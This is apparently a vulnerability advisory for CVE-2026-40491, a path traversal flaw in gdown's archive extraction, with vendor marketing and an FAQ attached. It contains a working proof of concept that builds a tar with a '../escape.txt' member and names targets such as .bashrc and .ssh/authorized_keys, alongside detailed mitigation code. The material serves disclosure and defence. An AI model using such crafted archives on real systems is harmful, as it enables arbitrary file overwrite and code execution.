Summary
The gdown library (tested on v5.2.1) is vulnerable to a Path Traversal attack within its extractall functionality. When extracting a maliciously crafted ZIP or TAR archive, the library fails to sanitize or validate the filenames of the archive members. This allows files to be written outside the intended destination directory, potentially leading to arbitrary file overwrite and Remote Code Execution (RCE).
Details
The vulnerability exists in gdown/extractall.py within the extractall() function. The function takes an archive path and a destination directory (to), then calls the underlying extractall() method of Python's tarfile or zipfile modules without validating whether the archive members stay within the to boundary.
Vulnerable Code:
```python
# gdown/extractall.py
def extractall(path, to=None):
    # ... (omitted) ...
    with opener(path, mode) as f:
        f.extractall(path=to)  # Vulnerable: no path validation or filters
```
Even on modern Python versions (3.12+), if the filter parameter is not explicitly set or if the library's wrapper logic bypasses modern protections, path traversal remains possible as demonstrated in the PoC.
PoC
Steps to Reproduce
- Create the Malicious Archive (poc.py):
```python
import tarfile
import io
import os

# Create a target directory
os.makedirs("./safe_target/subfolder", exist_ok=True)

# Generate a TAR file containing a member with path traversal
with tarfile.open("evil.tar", "w") as tar:
    # Target: escape the subfolder and write to the parent 'safe_target'
    payload = tarfile.TarInfo(name="../escape.txt")
    content = b"Path Traversal Success!"
    payload.size = len(content)
    tar.addfile(payload, io.BytesIO(content))
print("[+] evil.tar created.")
```
- Execute the Vulnerable Function:
```sh
python3 -c "from gdown import extractall; extractall('evil.tar', to='./safe_target/subfolder')"
```
- Verify the Escape:
```sh
ls -l ./safe_target/escape.txt
# Output: -rw-r--r-- 1 user user 23 Mar 15 2026 ./safe_target/escape.txt
```
Recommended Mitigation
Implement path validation to ensure that all extracted files are contained within the target directory.
Suggested Fix:
```python
import os
import tarfile


def is_within_directory(directory, target):
    # Both paths are made absolute and normalised, so "../" components in
    # `target` are collapsed before the prefix comparison.
    abs_directory = os.path.abspath(directory)
    abs_target = os.path.abspath(target)
    prefix = os.path.commonpath([abs_directory])
    return os.path.commonpath([abs_directory, abs_target]) == prefix


# Inside extractall.py
with opener(path, mode) as f:
    if isinstance(f, tarfile.TarFile):
        # Check every member before anything is written to disk.
        for member in f.getmembers():
            member_path = os.path.join(to, member.name)
            if not is_within_directory(to, member_path):
                raise Exception("Attempted Path Traversal in Tar File")
    f.extractall(path=to)
```
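The suggested fix above checks only tar members, while the Summary names ZIP archives as well, and its abspath() comparison does not resolve symlinks that already exist under the destination. The following is an added, self-contained example (not gdown's code and not the advisory's fix) of a hardened `safe_extractall()` that validates both archive types before extraction, resolves the destination with realpath(), also checks the targets of tar link members, and uses the stdlib `filter="data"` where the running Python provides `tarfile.data_filter` (3.12+, and the backported 3.8 to 3.11 security releases). `demo()` builds a hostile tar, a hostile zip and a benign tar in a temporary directory (all constructed here) and reports how each is handled. Note that CPython's `zipfile.extractall` already strips `..` components from member names before writing, so for ZIP the explicit check turns a silent rename into a loud rejection; `tarfile` does no such rewriting outside the 3.12+ filters, which is why the tar branch matters most.

```python
import io
import os
import tarfile
import tempfile
import zipfile


def is_within_directory(directory, target):
    """True if archive member `target` (relative or absolute) lands inside `directory`.

    realpath() resolves symlinks already present on disk, so a member cannot
    escape through a pre-existing link the way a plain abspath() check allows.
    """
    abs_directory = os.path.realpath(directory)
    abs_target = os.path.realpath(os.path.join(abs_directory, target))
    try:
        return os.path.commonpath([abs_directory, abs_target]) == abs_directory
    except ValueError:  # different drives on Windows: cannot be inside
        return False


def _check_tar_members(tar, to):
    """Reject any member whose name, or whose link target, escapes `to`."""
    for member in tar.getmembers():
        if not is_within_directory(to, member.name):
            raise ValueError(f"tar member escapes destination: {member.name!r}")
        # Link members are extracted as links; their targets must stay inside too.
        # Hard-link targets are relative to the archive root, symlink targets to
        # the directory containing the link.
        if member.issym() or member.islnk():
            base = "" if member.islnk() else os.path.dirname(member.name)
            if not is_within_directory(to, os.path.join(base, member.linkname)):
                raise ValueError(
                    f"tar link escapes destination: {member.name!r} -> {member.linkname!r}"
                )


def safe_extractall(path, to=None):
    """Hypothetical hardened replacement for an unchecked extractall(path, to)."""
    to = os.path.realpath(to or os.getcwd())
    if tarfile.is_tarfile(path):
        with tarfile.open(path) as tar:
            _check_tar_members(tar, to)
            if hasattr(tarfile, "data_filter"):
                # The stdlib filter additionally refuses absolute names, links
                # pointing outside the destination, and device files.
                tar.extractall(path=to, filter="data")
            else:
                tar.extractall(path=to)
    elif zipfile.is_zipfile(path):
        with zipfile.ZipFile(path) as zf:
            for name in zf.namelist():
                if not is_within_directory(to, name):
                    raise ValueError(f"zip member escapes destination: {name!r}")
            zf.extractall(path=to)
    else:
        raise ValueError(f"not a tar or zip archive: {path!r}")


def _write_tar(path, member_name, content=b"x"):
    """Constructed sample archive with a single regular-file member."""
    with tarfile.open(path, "w") as tar:
        info = tarfile.TarInfo(name=member_name)
        info.size = len(content)
        tar.addfile(info, io.BytesIO(content))


def demo():
    """Exercise safe_extractall() on constructed archives; returns a result dict."""
    results = {}
    with tempfile.TemporaryDirectory() as work:
        dest = os.path.join(work, "safe_target", "subfolder")
        os.makedirs(dest)

        evil_tar = os.path.join(work, "evil.tar")
        _write_tar(evil_tar, "../escape.txt")  # same shape as the advisory's PoC
        try:
            safe_extractall(evil_tar, to=dest)
            results["evil_tar"] = "extracted"
        except ValueError:
            results["evil_tar"] = "rejected"
        results["escape_written"] = os.path.exists(
            os.path.join(work, "safe_target", "escape.txt")
        )

        evil_zip = os.path.join(work, "evil.zip")
        with zipfile.ZipFile(evil_zip, "w") as zf:
            zf.writestr("../escape.txt", "x")
        try:
            safe_extractall(evil_zip, to=dest)
            results["evil_zip"] = "extracted"
        except ValueError:
            results["evil_zip"] = "rejected"

        good_tar = os.path.join(work, "good.tar")
        _write_tar(good_tar, "nested/ok.txt", b"fine")
        safe_extractall(good_tar, to=dest)
        results["good_tar"] = os.path.exists(os.path.join(dest, "nested", "ok.txt"))
    return results


if __name__ == "__main__":
    print(demo())
```

Rejecting the whole archive before the first write, rather than skipping individual members, is deliberate: a partially extracted archive is harder to reason about than an unchanged destination, and the error message names the offending member for logging.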
Impact
An attacker can provide a specially crafted archive that, when extracted via gdown, overwrites critical files on the victim's system.
- Arbitrary File Overwrite: Overwriting .bashrc, .ssh/authorized_keys, or configuration files.
- Remote Code Execution (RCE): By overwriting executable scripts or Python modules within a virtual environment.
Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files. Typical impact: unauthorized file read or write outside the intended directory.
CVE-2026-40491 has a CVSS score of 6.5 (Medium). The vector is network-reachable, no privileges required, and user interaction required. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (5.2.2); upgrading removes the vulnerable code path.
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-40491? CVE-2026-40491 is a medium-severity path traversal vulnerability in gdown (pip), affecting versions <= 5.2.1. It is fixed in 5.2.2. Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files.
- How severe is CVE-2026-40491? CVE-2026-40491 has a CVSS score of 6.5 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of gdown are affected by CVE-2026-40491? gdown (pip) versions <= 5.2.1 are affected.
- Is there a fix for CVE-2026-40491? Yes. CVE-2026-40491 is fixed in 5.2.2. Upgrade to this version or later.
- Is CVE-2026-40491 exploitable, and should I be worried? Whether CVE-2026-40491 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
- What actually determines whether CVE-2026-40491 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-40491? Upgrade gdown to 5.2.2 or later.